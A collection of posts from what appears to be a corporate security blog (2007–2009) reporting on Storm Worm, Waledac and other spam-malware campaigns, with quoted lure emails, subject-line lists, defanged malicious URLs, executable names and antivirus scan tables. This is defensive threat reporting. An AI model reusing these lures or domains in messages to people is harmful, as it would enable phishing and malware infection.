IT Security Blog

In my copious amounts of spare time one of the things that I like to put thought into is where I believe the Threat Landscape is headed.  Even in just the last 10 years since the Melissa virus (yes, I know viruses extend quite a bit further back than that.  I'm just using this as a reference point) we've gone from mass mailing viruses to network worms that run through your network compromising any vulnerable host as quickly as it can to social engineering tricks that sometimes even make it difficult for the trained professional to tell whether something is real or fake. 

So, the question that I pose to myself is "What's Next?"  Taking even just the events of the last decade into account, where are we headed for the next few years?  Some of this is obviously hard to determine because that also involves being able to forecast what new technologies will be released, but we can start to make some assumptions based off of what is available today. 

Since this is a blog post, I'll try to keep this relatively brief.  Maybe it is something that I can submit as an article to some technology pub as a full byline article (Here's a free plug for the folks over at (IN)Secure Magazine, who just released Issue 22 today.  I like them and I've had the opportunity to write for them twice now) at some point soon.

Some things to think about:

-- The Insider Threat
Especially given the current economic conditions and the uneasiness around many offices around the country as to whether or not their companies will remain viable, organizations need to be ever cognizant of the data that is leaving their organization.  Given that the latest USB 3.0 spec that was released in November 2008 allows for data transfer speeds at about 5Gb per second sensitive, proprietary corporate data can be pulled off a company's network an onto a thumb drive faster than ever before.  Couple that with the number of disgruntled employees who either see the writing on the wall for their own jobs or who are upset at benefit and wage freezes/cutbacks, and you have a dangerous cocktail for data theft.  We need to make sure we are putting as much focus on protecting our sensitive assets from insiders who much more easily have access to proprietary data as we do keeping the external threats at bay.

-- VoIP
Voice over Internet Telephony technologies are being adopted at an ever increasing rate.  This is happening not only in the enterprise space, but in the consumer market.  Services like Vonage make it easier than ever for people to have portable phone numbers so that they can be easily reachable at local numbers by family members out of state.  VoIP implementations at organizations are also becoming ever popular as well.  As these technologies become more widely adopted we have started to see hints of what abuse of these tools might look like.  Throw away phone numbers used to make spam phone calls have started to become more common.  There are services available online which allow you to purchase throw away numbers in blocks.  Spammers and can use and abuse these numbers just like they do IP addresses now. 

Another thing to watch out for is the compromise of VoIP systems as vulnerabilities start coming out in larger quantities.  Threats like direct voicemail injection will become another method that cyber criminals will use in order to get advertisements delivered to end users.  As the social engineering used in these threats improves, they could easily be used to steal personal identities and corporate data. 

-- Mobile Malware
Let's face it.  The phones that we carry in our pockets are little personal computers.  Although they lack the computing power of the quad-core processors now becoming commonplace on personal computers, they are another "always connected" device that people always have turned on.  I think the only time that I turn mine off on a weekly basis is when we are doing our weekly recording of the Security Buzz podcast, and that is mainly because the GSM buzz wreaks havoc with the microphones (and our Executive Producer's headphones :) ).  As mobile phone manufacturers have opened up their APIs to developers to create third party applications, they will need to be ever diligent in their QA processes to make sure that applications don't get posted to their distribution channels that contain some form of malware or open up a trojan backdoor to the device.  The mobile phone industry is growing by leaps and bounds with the addition of new, better, more feature rich smartphones entering the market.  The smartphone market is too large of a target for cyber criminals to ignore, especially if you consider the value of the data that we are now storing on these devices.  Secure sandboxing of third party applications is a must, but that is only a start.  Only hundreds of mobile malware variants exist today (compared to the approximately 1 every 4 seconds that is released for PCs), but that number is slowly growing and as hackers pay more attention to how they can penetrate mobile devices, that number is sure to only increase.

-- Social Networking
Social networks provide an interesting shift in the information sharing game because the rules that typically govern what personal data people are willing to share seem to have gone out the window.  This has really opened the door for cyber criminals.  With the data that is now available online through the use of social media sites like Facebook, Myspace, and Twitter criminals can much more easily target attacks to specific individuals or groups of individuals using data made available via public profiles or geolocation tools that map your IP address to what town you live in (or near) so that they can deliver compelling content which direct you to malware infected downloads (ala the Waledac botnet).  The Web of Trust that exists between users on social networking sites is being actively exploited regularly by hackers looking to take advantage of the fact that users will click on whatever their friends send to them.  It's already been proven that people will click on links and open attachments from people they don't know so why would they judge more closely the content from those that they do.

-- Political Hacktivism
Recently cyber criminals have picked up the pace a bit with respect to using online resources like social networking sites to quickly spread political messages in order to help them spread propaganda and recruit people to fight for their cause.  Due to the sensitive nature of political issues and the passion that people have for them, social engineering techniques like creating highly controversial views on sensitive topics is something that cyber criminals will latch onto in order to get people to react quickly and irresponsibly to either open attachments or visit websites that they would normally scrutinize more closely. 


These are only a small sampling of what I believe we will be encountering as we move forward (I didn't even go into the increased prevalence of compromise of legitimate web sites, and the further use of file sharing services, and calendar spam!), but they are things that we will need to keep top of mind as we look toward what threats are coming down the road.  Hackers will go where the money is and the money is where the people are.  So, whether it is Twitter, MySpace, Facebook, email, instant messenger, or our phones, criminals will leverage whatever technology is available because in their eyes the goal is to make money regardless of the available technologies, and if one person can be the one to figure out how to exploit a technology for their own financial gain before the others they'll end up getting the lion's share of the notoriety as well as beat defense mechanisms to the punch.

Last month we discussed the abuse of Twitter's Trending Topics system to increase the ranking of interesting topics so that links can be distributed via Tweets that lead users to phishing and malware sites.  This tactic was a follow up to previous abuses of Google's PageRank system which accomplished the same purpose.

The commonality with those two scenarios is that the cyber criminals had to do work to increase the ranking or interest of a particular topic in order to lure users to infected web sites. 

We are starting to see a new wrinkle where hackers are using already popular Google Trending Topics, search criteria that users are interested in and looking for through Google, to determine what users already want to see.  They are now tailoring their social engineering tactics to create new spam and websites that exploit users' curiosity.  No work required on a hacker's part to organically generate interest.  That interest is already being generated by high profile news stories, which have already shown to be very effective through the many iterations of Storm and Waledac over the past couple of years. 

An example is being reported by Dan Kaplan at SC Magazine where he said (via Sophos) that cyber criminals have created fake websites claiming to show nude videos of Erin Andrews, a popular ESPN reporter, who was recently videotaped through a peephole camera.  These fake websites are being used to inject malware onto curious users' computers.  They could also very easily be used in phishing campaigns to steal user's personal information.

Search criteria for these Erin Andrews videos through Google currently accounts for two out of the top three search trends at the writing of this post. 

As predicted in this month's MX Logic Threat Forecast and Report, cyber criminals have decided to take advantage of the July 4th holiday to send out spam that links to a malware infected web site.

All of the messages that our Threat Operations Center have observed thus far have July 4th themed subject lines and brief message bodies consisting of only a few words followed by a link, a tactic used many times by the Storm/Waledac folks previously. 

Some of the subject lines that we have seen thus far include:

Amazing firework 2009

Amazing Independence Day salute

Amazing Independence Day show

America for You and Me

America the Beautiful

American Independence Day

Bright and joyful Fourth of July

Celebrate Independence

Celebrate the spirit of America

Celebrate with Pride

Celebrating Fourth of July

Celebrating the Glory of our Nation

Celebrating the spirit of our Country

Celebrations have already begun

Fabulous Independence Day firework

Fourth of July Fireworks Shows

God Bless America

Happy Birthday America!

Happy Birthday USA!

Happy Birthday, America!

Happy Fourth of July

Happy Independence Day

Home of the Brave

Independence Day firework broke all records

Let the fireworks begin!

Let's celebrate Independence Day

Light up the sky

Long Live America

Proud to be an American

Sparkling Celebration of Independence Day

Spectacular fireworks show

Stars and Stripes Forever

Super 4th!

The best firework you've ever seen

The best of 4th of July Salute

This Land Is Your Land

Time for Fireworks

Well done 4th!

Traffic so far has been pretty modest, only at about 2,500-3,000 per hour and is likely being mitigated by the fact that many companies have given their employees July 3rd off this year in observance of the fact that this year's United States Independence Day holiday is on a Saturday.

Below is a screen shot of a sample message that someone may receive in conjunction with this campaign:




The site that users who click the link in the email are lured to claims to be a video of a fireworks show, but is actually a download of an executable file (video.exe) that when run will infect the user's PC.  So far all of the links that our Threat Operations Center have observed have been subdomains of the "moviesfireworks.com" domain, however our team is on the lookout for more, and this post will be updated as necessary.

Below is a screen shot of the fake video web site.






Here's to everyone having a safe, happy, and malware free July 4th holiday :)

Over the past several weeks we have been watching the Waledac botnet go through a couple of different phases.  Back in late January we reported on Waledac resorting back to its familiar roots of sending out spam to malware infected web sites.  Frequently these messages were tied to some sort of holiday and used e-cards as a lure to get potential victims to open the email and visit a malicious web site. 

We saw a couple of different iterations of their most recent Valentine's Day campaigns.  One was for a Valentine Devkit (see above link) and another was a lure for the ever popular e-card.  Since February 22nd, Waledac has taken a bit of a different twist on its typical holiday themes and have focused their efforts on something just as timely; the economy.  Making a copy of a legitimate web site that focuses on helping you save money (who wouldn't want to do that given current economic conditions?), couponizer.com, the Waledac folks sent out emails linking to their spoofed lookalike sites.  As with many other Waledac/Storm generated web sites, just about everything on the page is an image.  This is generally a dead giveaway to folks who have been tracking Waledac/Storm for quite some time, but is a minor fact that is likely lost on most users who are unaware they are being duped.  These images link to a binary executable file where when downloaded and run by the user enlist their PC into the botnet. 

Below is a screenshot representation of the fake couponizer site:



Take a moment to visit the real couponizer.com and you will notice that the look alike and legitimate sites bear some similarity.

Since this new variant launched the MX Logic Threat Operations Center has been processing about 15,000 of these messages per hour, a trend that continues 5 days after the tactic's original launch.

Below is a graph that illustrates volumes and shifts in Waledac tactics since 1/23/2009 (the date we started tracking the Devkit variant):



You'll notice that there is no overlap in tactics as Waledac shifts from one template to the next.  The Valentine's e-card tactic started on February 9th and the latest Couponizer spoof started on February 22nd.

Another interesting thing to notice from the graph is that we actually saw more Valentine's day e-card spam coming from Waledac AFTER Valentine's Day than before. 

Nevertheless, it is clear that the Waledac folks are working very hard to build their botnet back up to levels that it was at prior to Microsoft releasing its September  2007 MSRT update which Microsoft claims was responsible for mostly taking down its predecessor, Storm.  This botnet clearly isn't just about holidays anymore. 

Microsoft has announced that they have added Srizbi botnet code detection to their Malicious Software Removal Tool (MSRT) with its latest update.  As mentioned in the article, Microsoft claimed victory over the Storm botnet by cleaning up over 91,000 Storm infected PCs within 24 hours of their initial Storm heuristics were released back in September 2007.

As with when the original Storm botnet was mostly eradicated, Srizbi isn't a major player in the spam wars these days.  The Srizbi botnet never quite recovered from its days as one of the most prevalent spam botnets after McColo was shut down back in November.  The Cutwail and Mega-D botnets who were also largely affected by McColo are doing quite well for themselves, however.

As Joe Stewart said in the article, Microsoft would have served itself better to go after one of the newer botnets on the scene, like Xarvester or Donbot, or even Cutwail or Mega-D.  With all of the news surrounding Confickr and how that botnet still lies in waiting to come alive that would be another prime candidate to target.  I agree with Joe where he said it will be nice to get these machines cleaned up, but it isn't going to have an affect on spam volumes.

It looks like the Waledac botnet folks are at it again...new e-card spam with links to malware using a Valentine's Day theme.

The email itself is your standard fare e-card Valentine's Day lure (subject lines starting with "You've got an e-card at <random greeting card domain>", however differing from many previous incarnations of e-card spam the From address does not try to spoof any of the common greeting card web sites (mistake number 1):

----------------------------------------
Ted just mailed to you an Online greeting card and wrote this to you:
"You're So Sweet!"

You may pick it up from:
hxxp://yyiet.worshiplove.com/?ID=769bdb96a22c0866ea1ecb731
Your eCard will be available for the next 20 days.
----------------------------------------

We have also seen samples of this tactic linking to yourgreatlove.com, a known Waledac domain. 

Clicking the link in the email will bring you to a cute web site with puppies giving you "the eyes" enticing you to download their malware:



Clearly there is a disconnect between the email which is telling you to pick up your e-card and the web site which is asking you to download a "Valentine Devkit" (mistake number 2).  As a result of this perceived error, volumes are very low (only a few here and there thus far), but this does appear to be a sign that the Waledac gang is gearing up for some kind of Valentine's Day campaign. 

The commercial AV guys don't appear to be up on this one yet so keep your eyes open!  We'll be monitoring the Waledac guys up to and through Valentine's Day this weekend and will post any new variants that we see coming from these guys here.

Starting during the 8pm MST hour on Thursday night (January 22nd) our Threat Operations Center observed a new Valentine's Day themed spam that appears to be coming from the Waledac botnet (new Storm botnet) gang, following in the tradition of Storm by sending out holiday themed emails further lending validation to the theory that the folks who are behind Waledac are likely the same ones that created Storm.

Emails are short and sweet one liners with content like "Me and You", "In Your Arms", and "With all my love" followed by a web site link.  No malware is attached to the email itself.  Subject lines also have a love theme to them.  Some of the examples that our Threat Operations Center have observed include "Falling in love with you", "I belong to you", and "I love being in love with you".  Once the link in the email is clicked the user is brought to a site that has an image of 12 hearts and has the bold text "Guess, which one is for you?" and looks like the following:




Clicking anywhere within the hearts is a link to an executable file that the user can download an install to infect themselves.  Infection does not occur merely by visiting the page.  The executable file (e.g. you.exe or love.exe) must be run to install the malware. 

This page is also using Google Analytics to track number of visitors and where those visitors are coming from.

Volumes have been modest, but have accounted for about 10% of the malicious email that we have seen within the past 24 hours.  Traffic has been steadily Increasing since they were first observed as illustrated in the graph below:




Clearly the old Storm folks are working as hard as they can in efforts to build up their new botnet and are following the old tried and true methods of centering their social engineering tactics around holiday themes.  It was very successful for them the last time around so why fix what isn't broken, right?  Nevertheless, it still impresses me that tactics like this continue to work and be so effective despite how many times it gets recycled.


*** UPDATE 1/23/2009 3:20pm MST *** Volumes have been steadily increasing over the course of the day.  Average volume since 9am is about 11k per hour.  We will continue to monitor over the course of the weekend and will post updates as necessary.




*** UPDATE 1/26/2009 8:30am MST *** No significant morphs of this tactic over the weekend.  The folks over at shadowserver.org have posted a list of the domains being spamvertised as part of this campaign.  If you are not already doing so, you may want to consider blocking access to them.  Volumes of this email have been hovering at around 4,000 per hour for the last 36 hours and appeared to take a brief 5 hour hiatus Saturday afternoon between the hours of 2-7pm MST.  Maybe they were watching the NHL All Star Festivities :)  Current volume graph below ***

....or so spammers would have you believe.

A couple of days before the inauguration of president-elect Barack Obama spammers are sending out political propaganda that would have you believe that Barack Obama no longer wishes to be President of the United States. 

Spam emails are being sent out with subject lines such as "Haven't you heard latest news about our president-elect?" (Funny enough, one of these samples originated in Brazil.  Is Obama about to be President down there too? :) ), "End-time for USA", and "Who will be our president now?".  The messages are single line spam messages with phrases of only a few words followed by a link to a barackobama.com look-alike site.  Some of the phrases being used in the emails that we have observed are "Barack Obama abandoned sinking ship" and "Obama doesn't wany anymore to be a president".

The site that users are lured to if they click the link in the email looks like this:




All of the links on the site link to a file named pdf.exe which McAfee is calling part of the Waledec family of malware.  Waledec is widely considered to be the new incarnation of the Storm Worm based on its similarities in behavior to the original Storm which has been eradicated. 

As is often the case with these new outbreaks, AV detection is scarce so be aware of this new tactic.  Taking a brief opportunity to toot our own horn, we predicted this type of attack in the January edition of our Threat Forecast and Report.

Volumes are currently averaging about 4,000 per hour hitting the MX Logic systems.  We will continue to monitor this over the weekend and update as necessary.


*** UPDATE 1/19/2009 3:30pm MST *** Volumes have averaged between 5-16k messages per hour over the weekend and into Monday with today's average hovering around 10,000 per hour.  No new significant variants have been observed.  Below is an updated volume graph:



As you can see, there are still significant peaks and valleys in Obama email message flow which means that this campaign is still actively sending out spam.  With Tuesday's inauguration we will continue to monitor for either another resurgence of this tactic or the emergence of another new variant from the PCs responsible for sending out this current spam wave.  As soon as anything crops up, we will be sure to make you all aware.

It has been one month since McColo had its upstream bandwidth cutoff by Global Crossing and Hurricane Electric.  What has changed since? 

As we've previously reported (here and here), immediately after the McColo shutdown we saw a 50-60% decline in spam volume.  This drop carried on for about 9 days even though in the middle of all of this McColo was briefly brought back online by TeliaSonera.  During this brief uptime the Rustock botnet was able to update itself and point its bots to different command and control hosts.  It wasn't until 4 days later that Rustock came back with a vengeance and resumed its normal spamming activities.

Since that time we have also seen the Mega-D botnet come back online as well.  The current net result is still positive as spam volumes are still about 40% lower than what they were prior to McColo.  This is largely due to the fact that the Srizbi botnet still only shows minor signs of life despite reports that Srizbi is back in the hands of its original owners.

I am still surprised that these botnets were so easy to cripple to begin with, even if only temporarily.  What this will end up leading to, however is the bigger, better botnet which will have more redundancy built in, have command and control centers that are live on multiple networks having bandwidth provided by multiple providers and fast fluxes both its nodes and nameservers to create a truly interconnected network that can only be taken down by effectively removing all of the connected, infected machines.  Add in encrypted channel communication between the nodes and some of the DDoS defense mechanisms incorporated by botnets like Storm and your botnet is bulletproof.

As defenses improve, attack tactics evolve.  Just like when Word macro writers realized that they had to move on to the next generation of infection, those who are diligently working on new botnet communication technology are working on the next generation botnets (yes, plural).  Get ready.

Of course it is appropriate that on the same day we write about the author of fast flux pleading guilty to a felony that we see another Storm Worm variant come out.  Granted, new Storm Worm variants are nothing new.  They come out all the time.  I figured I would send out some red flags on this one because as of the time of this writing AV identification of this new variant is less than 10%.

The lure is your typical one-liner type of email which has a love lure in the message body such as "I Want You, I Need You, I Love You" or "You are in my heart" followed by a link to a web site that serves up two executables (both linked to Storm).

This is a screen shot of what the site looks like:



Clicking on the banner at the top of the page attempts to download a file named winner.exe.  Clicking the "Click Here" link attempts to download mylove.exe.

Here are the virustotal.com results for winner.exe and mylove.exe:

Antivirus	Version	Last Update	Result
AhnLab-V3	2008.7.1.0	2008.06.30	-
AntiVir	7.8.0.59	2008.06.30	-
Authentium	5.1.0.4	2008.06.29	-
Avast	4.8.1195.0	2008.06.30	-
AVG	7.5.0.516	2008.06.30	-
BitDefender	7.2	2008.06.30	-
CAT-QuickHeal	9.50	2008.06.30	-
ClamAV	0.93.1	2008.07.01	-
DrWeb	4.44.0.09170	2008.06.30	-
eSafe	7.0.17.0	2008.06.30	Suspicious File
eTrust-Vet	31.6.5914	2008.06.30	-
Ewido	4.0	2008.06.27	-
F-Prot	4.4.4.56	2008.06.29	-
F-Secure	7.60.13501.0	2008.06.26	-
Fortinet	3.14.0.0	2008.07.01	-
GData	2.0.7306.1023	2008.06.30	-
Ikarus	T3.1.1.26.0	2008.06.30	-
Kaspersky	7.0.0.125	2008.07.01	-
McAfee	5328	2008.06.30	-
Microsoft	1.3704	2008.07.01	-
NOD32v2	3229	2008.06.30	-
Norman	5.80.02	2008.06.30	-
Panda	9.0.0.4	2008.07.01	Suspicious file
Prevx1	V2	2008.07.01	-
Rising	20.51.02.00	2008.06.30	-
Sophos	4.30.0	2008.07.01	-
Sunbelt	3.1.1509.1	2008.06.30	-
Symantec	10	2008.07.01	-
TheHacker	6.2.96.365	2008.07.01	-
TrendMicro	8.700.0.1004	2008.06.30	-
VBA32	3.12.6.8	2008.06.30	-
VirusBuster	4.5.11.0	2008.06.30	-
Webwasher-Gateway	6.6.2	2008.06.30	-

Antivirus	Version	Last Update	Result
AhnLab-V3	2008.7.1.0	2008.06.30	-
AntiVir	7.8.0.59	2008.06.30	-
Authentium	5.1.0.4	2008.06.29	-
Avast	4.8.1195.0	2008.06.30	-
AVG	7.5.0.516	2008.06.30	-
BitDefender	7.2	2008.06.30	Trojan.Peed.JLV
CAT-QuickHeal	9.50	2008.06.30	-
ClamAV	0.93.1	2008.07.01	-
DrWeb	4.44.0.09170	2008.06.30	-
eSafe	7.0.17.0	2008.06.30	Suspicious File
eTrust-Vet	31.6.5914	2008.06.30	-
Ewido	4.0	2008.06.27	-
F-Prot	4.4.4.56	2008.06.29	-
F-Secure	7.60.13501.0	2008.06.26	-
Fortinet	3.14.0.0	2008.07.01	-
GData	2.0.7306.1023	2008.06.30	-
Ikarus	T3.1.1.26.0	2008.06.30	Email-Worm.Win32.Zhelatin.zy
Kaspersky	7.0.0.125	2008.07.01	-
McAfee	5328	2008.06.30	-
Microsoft	1.3704	2008.07.01	-
NOD32v2	3229	2008.06.30	-
Norman	5.80.02	2008.06.30	-
Panda	9.0.0.4	2008.07.01	-
Prevx1	V2	2008.07.01	-
Rising	20.51.02.00	2008.06.30	-
Sophos	4.30.0	2008.07.01	-
Sunbelt	3.1.1509.1	2008.06.30	-
Symantec	10	2008.07.01	-
TheHacker	6.2.96.365	2008.07.01	-
TrendMicro	8.700.0.1004	2008.06.30	-
VBA32	3.12.6.8	2008.06.30	-
VirusBuster	4.5.11.0	2008.06.30	-
Webwasher-Gateway	6.6.2	2008.06.30	-

So, as you can see, AV pickup so far has been non-existent although I am sure it will pick up soon.  The IPs that are hosting the infected URLs are being rotated using fast flux.  In just the 15 minutes that I have been monitoring some of the sites they have already changed IPs several times. 

This is not likely to be the only time this week that we hear from Storm.  Last year during the July 4th holiday is when we started to see the big fake e-card Storm surge.  Although most people are used to seeing these by now, they always manage to be popular social engineering lures nonetheless. 

Expect to see some revisit of Storm sometime later this week.  It might not be e-cards, but in following with Storm's tradition of releasing new variants on or near holidays, I would be very surprised if a Storm weren't already brewing.

Starting yesterday (June 18th) we began seeing evidence of a new Storm Worm variant claiming news of a new Earthquake in China. 
Some of the subject lines associated with these messages include:

2008 Olympic Games are under the threat
A new powerful disaster in China
A new deadly catastrophe in China
China is paralyzed by new earthquake
China's most deadly earthquake
Chinese people are horrified by new earthquake
Countless victims of earthquake in China
Deadly catastrophe in Chinese capital
Death toll in China exceeds 1000000
Death toll in China is growing
Earth tremors in China is going on
Recent earthquake in china took a heavy toll
Recent china earthquake kills million
Terrible earthquake devastated Beijing
The capital of China were collapsed by earthquake
The most powerful quake hits China       
Toll mounts in China earthquake
Unprecedented earthquake in China

This is a pretty typical tactic for Storm: ride on the wave of current events as a social engineering lure to get users to click on links in emails.  This variant is primarily targeting the Chinese earthquakes, but there is also a mention of the Beijing Olympics as well stating that the Olympics will be "under the threat." 

If a user clicks the link within one of these emails, they are not immediately infected with Storm.  They will be directed to a web site (all of the ones that we have seen so far have a .cn TLD) that looks like this:


It is important to note that this is not a real video player, but clicking the player will launch a file named beijing.exe which will infect your PC.

Volume of this variant is pretty low.  We are currently seeing on the order of about 900 per hour in our Threat Operations Center.  Expect to see similar stories of this nature threatening the safety of the Olympics as well as its participants and visitors as the event gets closer. 

We're seeing a new Google Spam run with a malware component making the rounds where the subject line of the message alleges that some of the more popular news agencies have released a Special Report with respect to a new video having been released from Osama bin Laden.  Volume is currently only less than 1% of total inbound virus traffic, so it is pretty low, but is yet another abuse of the Google PageRank system in an attempt to deliver malware.

Some of the subject lines that we have seen include:

Special issue of news from  CNN! Urgent  Fresh News Usama Ben Laden!
Special issue of news from  CNBC! Urgent  Fresh News Usama Ben Laden!
Special issue of news from  Financial Times! Urgent  Shocking News Usama Ben Laden!
Special issue of news from  CNN! Urgent  Apocalyptic News Usama Ben Laden!
Special issue of news from  Bloomberg! Urgent  Fresh News Usama Ben Laden!


You can see a fairly common theme here. 

The email itself is somewhat lengthy and mostly discusses the tragedies that bin Laden has orchestrated against targets around the world.  The most pertinent parts of the message appear at the top (as usual, many grammatical errors exist throughout the message):

Special issue of news from Reuters! Urgent Dangerous News!

hxxp://www.google.com/pagead/iclk?sa=l&ai=PBXCNHM&num=03311&adurl=http://cavalldemar.org/news_usa.php 

 

Usama bin Laden(Osama bin Laden) one of the largest organizers of terrorist

 activity, and similarly the largest leaders of terrorist organization of Al

 Kaeda, detained American soldiery force in Iraq.

 

This particular sample was taken from a message where the subject says that the news update is from CNN so you can see that the news agency in the subject line is not necessarily consistent in the actual message itself.  If the link from the message is followed, it directs the user to a page where they download a file named videousa.exe, which contains the malware.

Also, as of the time of this posting the link to hxxp://cavelldemar.org/news_usa.php (domain registered in Spain) is still active and AV identification is spotty:

Antivirus	Version	Last Update	Result
AhnLab-V3	2008.4.22.0	2008.04.21	Win-Trojan/Agent.77824.DX
AntiVir	7.8.0.8	2008.04.21	TR/Crypt.XPACK.Gen
Authentium	4.93.8	2008.04.20	-
Avast	4.8.1169.0	2008.04.21	-
AVG	7.5.0.516	2008.04.21	Downloader.Zlob.12.AH
BitDefender	7.2	2008.04.21	-
CAT-QuickHeal	9.50	2008.04.19	(Suspicious) - DNAScan
ClamAV	0.92.1	2008.04.21	-
DrWeb	4.44.0.09170	2008.04.21	-
eSafe	7.0.15.0	2008.04.17	Suspicious File
eTrust-Vet	31.3.5720	2008.04.21	-
Ewido	4.0	2008.04.21	Backdoor.Agent.gxg
F-Prot	4.4.2.54	2008.04.20	-
F-Secure	6.70.13260.0	2008.04.21	Backdoor.Win32.Agent.gxg
FileAdvisor	1	2008.04.21	-
Fortinet	3.14.0.0	2008.04.21	-
Ikarus	T3.1.1.26	2008.04.21	Trojan.Win32.Revelation
Kaspersky	7.0.0.125	2008.04.21	Backdoor.Win32.Agent.gxg
McAfee	5277	2008.04.18	-
Microsoft	1.3408	2008.04.21	TrojanDropper:Win32/Nuwar.gen!lds
NOD32v2	3043	2008.04.21	-
Norman	5.80.02	2008.04.18	-
Panda	9.0.0.4	2008.04.20	-
Prevx1	V2	2008.04.21	-
Rising	20.41.02.00	2008.04.21	-
Sophos	4.28.0	2008.04.21	Mal/Generic-A
Sunbelt	3.0.1056.0	2008.04.17	-
Symantec	10	2008.04.21	-
TheHacker	6.2.92.285	2008.04.19	-
VBA32	3.12.6.4	2008.04.16	Trojan.Win32.Revelation
VirusBuster	4.3.26:9	2008.04.21	-
Webwasher-Gateway	6.6.2	2008.04.21	Trojan.Crypt.XPACK.Gen

Fake video downloads and updates have been a pretty common theme for the Storm Worm folks for quite some time now.  This "news story" social engineering tactic is what Storm originally used to get most people infected back in January, 2007, so many people have already "been there, done that" which is likely why infection rates are staying pretty low.

Never to rest on their laurels, the Storm Worm gang brings us yet another new twist in how they are trying to get you to infect your PC. 

This new Storm variant follows in the footsteps of the Google Spam with a purported video download that I blogged about on April 3rd except that Storm is trying to convince you that you want to view a new music video that has just been released.

Here is an example of one of the messages that came into our Threat Operations Center:

Eagles just made a new video. See it here before it releases. Cut and
paste the link in your browser to get the video:
hxxp://zbrkfdxd[deleted].blogspot.com

All of the examples that we have seen thus far have been random subdomains off of blogspot.com, a popular, free blog hosting site.  When the link in the email is clicked you are immediately redirected to hxxp://giftapplys.cn (registered on April 8th) which serves up the below page:



Both the fake video player and the "Download it" link point to the malware download.  Interestingly enough, the video player points to a file named StormCodec.exe and the Download It link points to a file named StormCodec8.exe.  These files have the same md5 checksum (2f16017932e729b8a9f1f5c07eec9b99), however so despite their different names, they are actually the same file.

We've only seen about 50,000 of these messages over the last 24 hours (I say "only" because many Storm Worm variants are in the millions within their first day) so this tactic isn't too popular at the moment, but is new and different from previous tactics so is definitely something to keep on the lookout for.

I'm sure nobody saw this coming (tongue firmly lodged in cheek), but the folks that have brought us Storm Worm variants like e-cards and Christmas Greetings have brought us a Valentine's Day variant just in time for the February 14th holiday.

Traffic that we have seen thus far in relation to this worm peaked during the 1am and 2am (mountain standard time) hours this morning and has been steadily dropping ever since, but I have a hard time believing that this trend will continue with Valentine's Day still two days away!

This new variant follows the same paradigm as the ones that we have seen previously: Subject line and message body related to the upcoming holiday and a random link which points the user to a web site where they download an executable (like valentine.exe) and get infected. Nothing new.

Some of the subject lines that we have seen in relation to this worm include:

Is Anything Beautiful As A Rose?

You're my Velentine! (note the misspelling)

You Stay In My Heart

Smiley Kiss

Sample message bodies potentially include the same text as the subject line. We've seen some variances here, but it looks like the subject line and message text are pulling from just about the same static list.

Playing on emotion and holiday themes continues to be a successful social engineering tactic for the Storm Worm gang, and will continue to be popular until such time as it ceases to be effective. As with all of the other variants, don't get hit by this Cupid's arrow. There is no love to be found here!

 

According to this article at internetnews.com, American and Russian law enforcement agencies know who is behind the creation of the Storm Worm.

The article goes into detail on the difficulties of extradition to the United States if American officials request it so I won't belabor that point here.

What is important is whether or not this could mean the end of the Storm Worm? Unfortunately not. We already know from research done by Joe Stewart that recent variants of the Storm Worm are using a key to encrypt their P2P traffic basically segregating the network into chunks that use this same key to communicate. This means that these portions of the botnet could be sold off and used for whatever purposes the buyer wanted to use them for: more spam, different malware, etc. If the Storm Worm code is also made available, then there is nothing stopping Storm from living on.

Even scarier is the notion that we have seen the evolution of malware and it only gets nastier and nastier with one idea building off the previous. So, even if we don't see additional specific Storm Worm variants if/when the authors are arrested, the concepts and code will certainly live on and take on new shapes in the next popular malware strains.

I have to admit that as much as I am tired of talking about the Storm Worm, it keeps giving such great fodder for discussion. Over the past year we have seen fake video clips for current events and e-cards. Now Storm has expanded its horizons and has started sending out one-liner spam with the prospect of a better life between the sheets.

Some of the sample subject lines that we have seen from this new Storm variant include:

-- why you're so unhappy with your bedroom life?

-- Ladies and Gents want to have perfect nights!

-- Become a super-lover-2008!

-- What you will learn from us will change your sensual life for better!

All of the samples that we have received have had one-liner spam where the message body is sometimes the same as the subject line (many times not) followed by a URL pointing to a random IP address like hxxp://61,79,172,152/rqokyj/ (modified so you can't actually click the link).

As if we don't see enough health related spam already, now Storm has jumped on the bandwagon as well. I guess if it works for the spammers...

In keeping with form the gang responsible for the Storm Worm (and its many variants) has been releasing updates to correspond with the New Year holiday coming up next Tuesday (they also released some Christmas joy as well on Christmas eve for those who wanted early "presents").

They've been changing domains linked to in the email that is directing you to the malware download. So far we have seen:

happycards2008.com

newyearcards2008.com

happynewyearcards2008.com

uhavepostcard.com

All of the above sites are currently active except for happynewyearcards2008.com which appears to be offline.

If the link in the email is clicked it takes you to a site where it tells you that your download will begin shortly (actually it is scanning for vulnerabilities for it to exploit on your PC) and that if your download doesn't start to click to download the file manually. When the link is clicked the malware is downloaded so that people can infect themselves. This is akin to other Storm Worm variants which operated in a similar fashion.

The downloaded file is changing names also. Currently the file is happynewyear2008.exe, but previous variants have downloaded happy2008.exe, happy-2008.exe, and happynewyear.exe.

Have a Happy New Year, but don't party with the Storm Worm Gang!

I realize that I have been a bit lax in my posting over the past couple of weeks with the holidays and having been sick for a goodly amount of time (is any time that you are sick really "good" time?) as well. I thought I would take some time to attempt to bring 2007 to a close with a wrap up of what we have seen this year. I'll probably make some references to our 2008 predictions blog posting as well since some of what we have seen this year will carry over to next and beyond.

2007 will most certainly be known in the anti-spam and anti-malware worlds as the year of the Storm Worm. From late January when Storm was first discovered all the way through the end of the year where even up to this weekend we continued to see additional Christmas e-card variants popping up, Storm Worm volumes not only eclipsed every other piece of malcode that we saw in our Threat Center, but it also surpassed volumes seen previously only by the outbreaks of the Sober worm back in 2005. Since the Storm Worm has been so adept at refining its social engineering tactics and has primarily been releasing new variants around major events like holidays, expect this to continue into 2008 likely morphing into political spam as the presidential races continue to heat up.

Speaking of social engineering, we saw several refinements this year not only in how it is used as a lure to attempt to get a user to open a message, but in how spam mail itself is targeted. Starting in late May and continuing through June (there was another that popped up in December also) spammers were forging emails purporting to be from government agencies like the FTC and non-profits like the Better Business Bureau in an attempt to make the message look like a complaint was being filed against the target company. What made these messages so unique and effective is that they were targeted and sent directly to C-level executives. If the target opened the attachment/clicked the link within the message body they were infected with a keylogger which would log any information input into the infected machine and upload it to a web site where cyber criminals were then selling that information for profit.

We also saw a significant shift away from image based spam, a tactic that had been prevalent in larger volumes since December, 2005. Image spam had been the big spam story throughout all of 2006 and even into the early parts of 2007, reaching almost 40% of spam volumes in April of this year. As it reached its peak, however, it quickly started to decline. As image spam waned, we saw the dawn of a new spam: PDF spam!

